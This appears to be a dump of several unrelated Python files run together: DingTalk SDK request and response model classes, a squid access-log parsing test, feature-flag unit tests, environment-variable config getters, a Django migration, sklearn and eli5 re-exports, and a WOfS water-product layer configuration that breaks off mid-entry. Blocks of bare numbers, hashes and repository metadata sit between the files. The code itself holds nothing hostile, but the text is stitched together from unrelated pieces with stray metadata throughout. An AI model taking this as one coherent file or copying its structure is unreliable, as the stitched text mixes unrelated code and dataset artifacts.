        if base is not None:
            return base
        data = {}
        if self.headers is not None:
            data['headers'] = self.headers
        if self.body is not None:
            data['body'] = self.body.to_map()
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = BatchUpdateDeviceResponseBody().from_map(m['body'])
        return self
class BindSystemHeaders(TeaModel):
    """Request headers: common headers plus the DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.common_headers is not None:
            data['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            data['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        common = m.get('commonHeaders')
        if common is not None:
            self.common_headers = common
        token = m.get('x-acs-dingtalk-access-token')
        if token is not None:
            self.x_acs_dingtalk_access_token = token
        return self
class BindSystemRequest(TeaModel):
    """Request payload for binding a third-party system."""
    def __init__(
        self,
        corp_id: str = None,
        auth_code: str = None,
        client_id: str = None,
        client_name: str = None,
        extra_data: Dict[str, Any] = None,
    ):
        # DingTalk IoT corp ID of the third-party platform user.
        self.corp_id = corp_id
        # Temporary authorization code for binding verification.
        self.auth_code = auth_code
        # User ID on the third-party platform.
        self.client_id = client_id
        # User name on the third-party platform.
        self.client_name = client_name
        # Extra parameters agreed with the third-party platform.
        self.extra_data = extra_data

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        # Emit keys in declaration order, skipping unset fields.
        for key, value in (
            ('corpId', self.corp_id),
            ('authCode', self.auth_code),
            ('clientId', self.client_id),
            ('clientName', self.client_name),
            ('extraData', self.extra_data),
        ):
            if value is not None:
                data[key] = value
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        for key, attr in (
            ('corpId', 'corp_id'),
            ('authCode', 'auth_code'),
            ('clientId', 'client_id'),
            ('clientName', 'client_name'),
            ('extraData', 'extra_data'),
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class BindSystemResponseBody(TeaModel):
    """Response body: the bound corp and client identifiers."""
    def __init__(
        self,
        corp_id: str = None,
        client_id: str = None,
    ):
        # DingTalk IoT corp ID.
        self.corp_id = corp_id
        # User ID on the third-party platform.
        self.client_id = client_id

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.corp_id is not None:
            data['corpId'] = self.corp_id
        if self.client_id is not None:
            data['clientId'] = self.client_id
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        corp_id = m.get('corpId')
        if corp_id is not None:
            self.corp_id = corp_id
        client_id = m.get('clientId')
        if client_id is not None:
            self.client_id = client_id
        return self
class BindSystemResponse(TeaModel):
    """Wrapper pairing response headers with the parsed response body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: BindSystemResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.headers is not None:
            data['headers'] = self.headers
        if self.body is not None:
            data['body'] = self.body.to_map()
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = BindSystemResponseBody().from_map(m['body'])
        return self
| 29.76609
| 84
| 0.571166
| 5,402
| 43,012
| 4.360237
| 0.040541
| 0.048612
| 0.087501
| 0.059862
| 0.84699
| 0.823512
| 0.807251
| 0.795831
| 0.783094
| 0.767895
| 0
| 0.001177
| 0.328141
| 43,012
| 1,444
| 85
| 29.786704
| 0.813897
| 0.024226
| 0
| 0.884979
| 1
| 0
| 0.072912
| 0.015465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120172
| false
| 0.025751
| 0.001717
| 0
| 0.24206
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
753d6ef78a8b8c668ebf9d3b7a37c711435f44c7
| 3,606
|
py
|
Python
|
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | null | null | null |
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | 1
|
2021-03-25T21:47:26.000Z
|
2021-03-25T21:47:26.000Z
|
tests/test_log.py
|
Carbyne-Solutions/logrdis
|
7c6c4a8e37c9268b71a37bb428916479e17c9d39
|
[
"BSD-4-Clause"
] | null | null | null |
"""Test the log on a real life squid sample."""
import re
from ..logrdis.log import find_match
SAMPLES="""time 2017-10-22_18:20:05+0000 time_response 60 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.228:443 user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 135 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TCP_MISS http_status_code 200 http_reply_size 69919 http_request_method GET http_request_url https://www.google.com/ user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type text/html\n'b'time 2017-10-22_18:20:06+0000 time_response 5 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 1 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\ntime 2017-10-22_18:20:06+0000 time_response 0 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.5.227:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 42 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TCP_MISS http_status_code 204 http_reply_size 374 http_request_method POST http_request_url https://www.google.com/gen_204? 
user_name - squid_hier_code ORIGINAL_DST ip_destination 172.217.5.228 http_content_type text/html\n'b'time 2017-10-22_18:20:06+0000 time_response 1 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\n'b'time 2017-10-22_18:20:06+0000 time_response 3 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -\ntime 2017-10-22_18:20:06+0000 time_response 0 mac_source 08:00:27:f4:c8:4b ip_source 10.0.2.16 squid_request_status TAG_NONE http_status_code 200 http_reply_size 0 http_request_method CONNECT http_request_url 172.217.7.131:443 user_name - squid_hier_code HIER_NONE ip_destination - http_content_type -"""
def test_find_match(test_yaml):
    """Test that find_match returns the expected entries.

    Every line of the SAMPLES fixture must be matched against the
    ``access_logs`` table pattern, and each named capture group must
    contain a value of the expected shape.
    """
    cfg = test_yaml()
    for sample in SAMPLES.split('\n'):
        tablename, match = find_match(sample, cfg)
        assert tablename == "access_logs", "Invalid table matched"
        # Raw strings: sequences like "\d" are invalid escapes in plain
        # string literals (SyntaxWarning on CPython >= 3.12).
        assert re.search(r"[\d\-\:\+]+", match.group("time"))
        assert re.search(r"\d+", match.group("time_response"))
        assert re.search(r"[\d\:\-]+", match.group("mac_source"))
        assert re.search(r"[\d\.\-]+", match.group("ip_source"))
        assert re.search(r"[\d\.\-]+", match.group("http_request_url"))
        assert re.search(r"[\d\.\-]+", match.group("ip_destination"))
| 163.909091
| 2,841
| 0.795341
| 688
| 3,606
| 3.859012
| 0.156977
| 0.078719
| 0.052731
| 0.033898
| 0.853107
| 0.853107
| 0.836535
| 0.751036
| 0.751036
| 0.751036
| 0
| 0.147004
| 0.102052
| 3,606
| 21
| 2,842
| 171.714286
| 0.672946
| 0.025513
| 0
| 0
| 0
| 0.071429
| 0.849843
| 0.061661
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f38ff5b0744cbf6b674f062f3f445e992690ba20
| 2,885
|
py
|
Python
|
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
grow/common/features_test.py
|
matthiasrohmer/grow
|
88fae5026040ad0f7dd9260ee290cebbe49b39d7
|
[
"MIT"
] | null | null | null |
"""Tests for features."""
import unittest
from grow.common import features
class FeaturesTestCase(unittest.TestCase):
    """Test the features control."""

    def _check(self, control, method_name, expectations):
        """Assert control.<method_name>(flag) is truthy/falsy per expectations."""
        probe = getattr(control, method_name)
        for flag, expected in expectations:
            if expected:
                self.assertTrue(probe(flag))
            else:
                self.assertFalse(probe(flag))

    def test_default_enabled(self):
        """Does the default enabled work?"""
        control = features.Features(default_enabled=True)
        self.assertTrue(control.is_enabled('unknown'))

    def test_default_enabled_false(self):
        """Does the default disabled work?"""
        control = features.Features(default_enabled=False)
        self.assertFalse(control.is_enabled('unknown'))

    def test_is_disabled_disabled(self):
        """Enabled features."""
        control = features.Features(disabled=['a', 'b'])
        self._check(control, 'is_disabled',
                    [('a', True), ('b', True), ('c', False)])

    def test_is_disabled_disabled_with_default_enabled_false(self):
        """Enabled features."""
        control = features.Features(disabled=['a', 'b'], default_enabled=False)
        self._check(control, 'is_disabled',
                    [('a', True), ('b', True), ('c', True)])

    def test_is_disabled_enabled(self):
        """Enabled features."""
        control = features.Features(enabled=['a', 'b'])
        self._check(control, 'is_disabled',
                    [('a', False), ('b', False), ('c', False)])

    def test_is_disabled_enabled_with_default_enabled_false(self):
        """Enabled features."""
        control = features.Features(enabled=['a', 'b'], default_enabled=False)
        self._check(control, 'is_disabled',
                    [('a', False), ('b', False), ('c', True)])

    def test_is_enabled_disabled(self):
        """Enabled features."""
        control = features.Features(disabled=['a', 'b'])
        self._check(control, 'is_enabled',
                    [('a', False), ('b', False), ('c', True)])

    def test_is_enabled_disabled_with_default_enabled_false(self):
        """Enabled features."""
        control = features.Features(disabled=['a', 'b'], default_enabled=False)
        self._check(control, 'is_enabled',
                    [('a', False), ('b', False), ('c', False)])

    def test_is_enabled_enabled(self):
        """Enabled features."""
        control = features.Features(enabled=['a', 'b'])
        self._check(control, 'is_enabled',
                    [('a', True), ('b', True), ('c', True)])

    def test_is_enabled_enabled_with_default_enabled_false(self):
        """Enabled features."""
        control = features.Features(enabled=['a', 'b'], default_enabled=False)
        self._check(control, 'is_enabled',
                    [('a', True), ('b', True), ('c', False)])
| 38.466667
| 76
| 0.655113
| 347
| 2,885
| 5.224784
| 0.092219
| 0.086045
| 0.100386
| 0.143409
| 0.883067
| 0.869829
| 0.809156
| 0.809156
| 0.783232
| 0.769994
| 0
| 0
| 0.192028
| 2,885
| 74
| 77
| 38.986486
| 0.777778
| 0.087695
| 0
| 0.653061
| 0
| 0
| 0.021004
| 0
| 0
| 0
| 0
| 0
| 0.530612
| 1
| 0.204082
| false
| 0
| 0.040816
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f39348d43aa6dcd807e0d936aca45e2ecd9e5f7c
| 139
|
py
|
Python
|
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
boilerplate/backend/utils/config.py
|
tamuto/boilerplate
|
47950c67e89dc6c7f8b24705c04c6f6061797bb2
|
[
"MIT"
] | null | null | null |
import os
def get_CORS():
    """Return the CORS setting from the BACKEND_CORS env var (None if unset)."""
    return os.getenv('BACKEND_CORS')
def get_DB_CONN():
    """Return the MySQL connection string from BACKEND_MYSQL_CONN (None if unset)."""
    return os.getenv('BACKEND_MYSQL_CONN')
| 13.9
| 47
| 0.71223
| 22
| 139
| 4.227273
| 0.5
| 0.129032
| 0.322581
| 0.387097
| 0.537634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158273
| 139
| 9
| 48
| 15.444444
| 0.794872
| 0
| 0
| 0
| 0
| 0
| 0.215827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
342f46a21f91d0879d7c8dea73ba5b13964778b2
| 2,165
|
py
|
Python
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 10
|
2020-11-12T15:13:40.000Z
|
2022-03-05T22:33:08.000Z
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 28
|
2020-07-17T16:33:55.000Z
|
2022-03-21T16:24:25.000Z
|
web/pipeline/migrations/0106_auto_20201023_2249.py
|
stevenstuber/CIT
|
8c485e72084c06da6db45da1cb402bac26411ec2
|
[
"Apache-2.0"
] | 5
|
2020-11-02T23:39:53.000Z
|
2022-03-01T19:09:45.000Z
|
# Generated by Django 2.2.13 on 2020-10-23 22:49
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relax eleven Project integer columns to accept blank/NULL values."""

    dependencies = [
        ('pipeline', '0105_auto_20201023_2112'),
    ]

    # Every listed column receives the same nullable IntegerField, so the
    # AlterField operations are generated from a single name tuple
    # (order matches the original hand-written list).
    operations = [
        migrations.AlterField(
            model_name='project',
            name=column,
            field=models.IntegerField(blank=True, null=True),
        )
        for column in (
            'clean_energy_ind',
            'construction_jobs',
            'estimated_cost',
            'federal_funding',
            'green_building_ind',
            'indigenous_ind',
            'municipal_funding',
            'operating_jobs',
            'other_public_funding',
            'provinvial_funding',  # sic: field name typo exists in the model
            'public_funding_ind',
        )
    ]
| 31.376812
| 61
| 0.566744
| 198
| 2,165
| 6.050505
| 0.257576
| 0.183639
| 0.229549
| 0.266277
| 0.774624
| 0.774624
| 0.741235
| 0.741235
| 0.705342
| 0.705342
| 0
| 0.021724
| 0.31963
| 2,165
| 68
| 62
| 31.838235
| 0.791582
| 0.021247
| 0
| 0.709677
| 1
| 0
| 0.136514
| 0.010864
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3433f922c84ebb99ebcc50a17af065823b889b56
| 222
|
py
|
Python
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | 2
|
2019-04-22T12:25:05.000Z
|
2019-05-05T16:49:12.000Z
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | 9
|
2019-04-06T14:27:22.000Z
|
2021-04-30T20:42:19.000Z
|
mlvajra/explanations/globalExp.py
|
rajagurunath/mlvajra
|
abaa40717342cecc785144700884e1c9d5910c43
|
[
"Apache-2.0"
] | null | null | null |
# Global-explanation helpers re-exported for convenience.
# NOTE(review): sklearn.ensemble.partial_dependence was deprecated in
# scikit-learn 0.21 and removed in 0.24 (moved to sklearn.inspection) —
# confirm the pinned scikit-learn version still provides this import path.
from sklearn.ensemble.partial_dependence import partial_dependence,plot_partial_dependence
from eli5.sklearn import PermutationImportance
# Public API of this module: the three re-exported names above.
__all__=['PermutationImportance','partial_dependence','plot_partial_dependence']
| 55.5
| 91
| 0.878378
| 23
| 222
| 8
| 0.434783
| 0.461957
| 0.228261
| 0.304348
| 0.413043
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004762
| 0.054054
| 222
| 4
| 92
| 55.5
| 0.871429
| 0
| 0
| 0
| 0
| 0
| 0.281818
| 0.2
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3453eb238bda33f6597f81be1b9336760fa4f2e1
| 15,151
|
py
|
Python
|
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/wofs/ows_wofsc2_cfg.py
|
eloise-b/config
|
070693cca69c1ee62a1995772668b172da15a4c3
|
[
"Apache-2.0"
] | null | null | null |
from ows_refactored.common.ows_reslim_cfg import reslim_wofs, reslim_wofs_daily
from ows_refactored.wofs.band_wofs_cfg import (bands_wofs_2_annual_summary,
bands_wofs_obs)
from ows_refactored.wofs.style_wofs_cfg import (
style_wofs_annual_summary_frequency,
style_wofs_annual_summary_frequency_blue, style_wofs_beta_summary_clear,
style_wofs_count_wet, style_wofs_frequency, style_wofs_frequency_blue,
style_wofs_obs, style_wofs_obs_wet_only, style_wofs_summary_clear,
style_wofs_water_annual_wet)
# datacube-ows layer configuration for the provisional WOfS (Water
# Observations from Space) products over Africa: one per-scene feature layer
# plus annual and all-time statistical summaries (frequency, wet count,
# clear count).  Bands, styles and resource limits come from the
# ows_refactored helper modules imported above.
layers = {
    "title": "Water Observations from Space (Beta)",
    "abstract": """WOfS""",
    "layers": [
        # Per-scene water observation feature layers (WOFLs), daily cadence.
        {
            "title": "Water Observations from Space Feature Layer (Beta)",
            "name": "ga_ls8c_wofs_2",
            "abstract": """
Water Observations from Space (WOfS) provides surface water observations derived from satellite imagery for all of Africa. The WOfS product allows users to get a better understanding of where water is normally present in a landscape, where water is seldom observed, and where inundation has occurred occasionally. Data is provided as Water Observation Feature Layers (WOFLs), in a 1 to 1 relationship with the input satellite data. Hence there is one WOFL for each satellite dataset processed for the occurrence of water.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
Daily water observations can be used to map historical flood and to understand surface water dynamics.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2",
            "bands": bands_wofs_obs,
            "resource_limits": reslim_wofs_daily,
            "image_processing": {
                # Bitflag masking: WOFL values are bit-encoded observations.
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_bitflag",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                # NOTE: the daily layer is served in EPSG:4326; the summary
                # layers below use the equal-area EPSG:6933 grid.
                "native_crs": "EPSG:4326",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["water"],
            },
            "styling": {
                "default_style": "observations",
                "styles": [
                    style_wofs_obs,
                    style_wofs_obs_wet_only,
                ],
            },
        },
        # Annual wet/clear frequency summary.
        {
            "title": "Water Observations from Space Annual Summary (Beta)",
            "name": "wofs_2_annual_summary_frequency",
            "abstract": """
Annual water summary is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows what percentage of clear observations were detected as wet (ie. the ration of wet to clear as a percentage) from each calendar year.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
The annual summaries can be used to understand year to year changes in surface water extent.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_annual_summary",
            "time_resolution": "year",
            "bands": bands_wofs_2_annual_summary,
            "resource_limits": reslim_wofs,
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["frequency"],
            },
            "styling": {
                "default_style": "WOfS_frequency",
                "styles": [
                    style_wofs_annual_summary_frequency,
                    style_wofs_annual_summary_frequency_blue,
                ],
            },
        },
        # Annual count of wet observations.
        {
            "title": "Water Observations from Space Annual Count of Wet Observations (Beta)",
            "name": "wofs_2_annual_summary_wet",
            "abstract": """
The count of wet observations is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows how many times water was detected in observations that were clear. This product was used as a source layer for calculating annual water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_annual_summary",
            "time_resolution": "year",
            "bands": bands_wofs_2_annual_summary,
            "resource_limits": reslim_wofs,
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["count_wet"],
            },
            "styling": {
                "default_style": "water_observations",
                "styles": [
                    style_wofs_water_annual_wet,
                ],
            },
        },
        # Annual count of clear observations.
        {
            "title": "Water Observations from Space Annual Count of Clear Observations (Beta)",
            "name": "wofs_2_annual_summary_clear",
            "abstract": """
The count of clear observations is one of the statistical summaries of the Water Observations from Space (WOfS) product that shows how many times an area could be clearly seen (I.e. not affected by clouds, shadows or other satellite observation problems). This product was used as a source layer for calculating annual water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_annual_summary",
            "time_resolution": "year",
            "bands": bands_wofs_2_annual_summary,
            "resource_limits": reslim_wofs,
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["count_clear"],
            },
            "styling": {
                "default_style": "annual_clear_observations",
                "styles": [
                    style_wofs_beta_summary_clear,
                ],
            },
        },
        # All-time wet/clear frequency summary.
        {
            "title": "Water Observations from Space All Time Summary (Beta)",
            "name": "wofs_2_summary_frequency",
            "abstract": """
All time water summary is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows what percentage of clear observations were detected as wet (ie. the ration of wet to clear as a percentage) over time.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
All time water summary can be used to understand water availability and flooding risk in a historical context.
WOfS shows surface water on the day and time that satellite passed overhead, which might be before, during or after a flood peak. Given the time between satellite passes (approximately once every 16 days) it is unlikely that the satellite will capture the maximum extent of any given flood. Instead, it aims to provide large scale, regional information on surface water.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_summary",
            "bands": bands_wofs_2_annual_summary,
            "time_resolution": "year",
            "resource_limits": reslim_wofs,
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["frequency"],
            },
            "styling": {
                "default_style": "WOfS_frequency",
                "styles": [
                    style_wofs_frequency,
                    style_wofs_frequency_blue,
                ],
            },
        },
        # All-time count of wet observations.
        {
            "title": "Water Observations from Space All Time Count of Wet Observations (Beta)",
            "name": "wofs_2_summary_wet",
            "abstract": """
The count of wet observations is one of the statistical summaries of the Water Observation from Space (WOfS) product that shows how many times water was detected in observations that were clear. This product was used as a source layer for calculating all time water summary.
This product has a spatial resolution of 30 m and a temporal coverage of 2013 to 2019.
It is derived from Landsat 8 satellite observations as part of a provisional Landsat Collection 2 surface reflectance product.
For more information on the algorithm, see https://doi.org/10.1016/j.rse.2015.11.003
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
            "product_name": "ga_ls8c_wofs_2_summary",
            "time_resolution": "year",
            "bands": bands_wofs_2_annual_summary,
            "resource_limits": reslim_wofs,
            "image_processing": {
                "extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
                "always_fetch_bands": [],
                "manual_merge": False,
            },
            "wcs": {
                "native_crs": "EPSG:6933",
                "native_resolution": [30.0, -30.0],
                "default_bands": ["count_wet"],
            },
            "styling": {
                "default_style": "water_observations",
                "styles": [
                    style_wofs_count_wet,
                ],
            },
        },
        # All-time count of clear observations.
        {
            "title": "Water Observations from Space All Time Count of Clear Observations (Beta)",
            "name": "wofs_2_summary_clear",
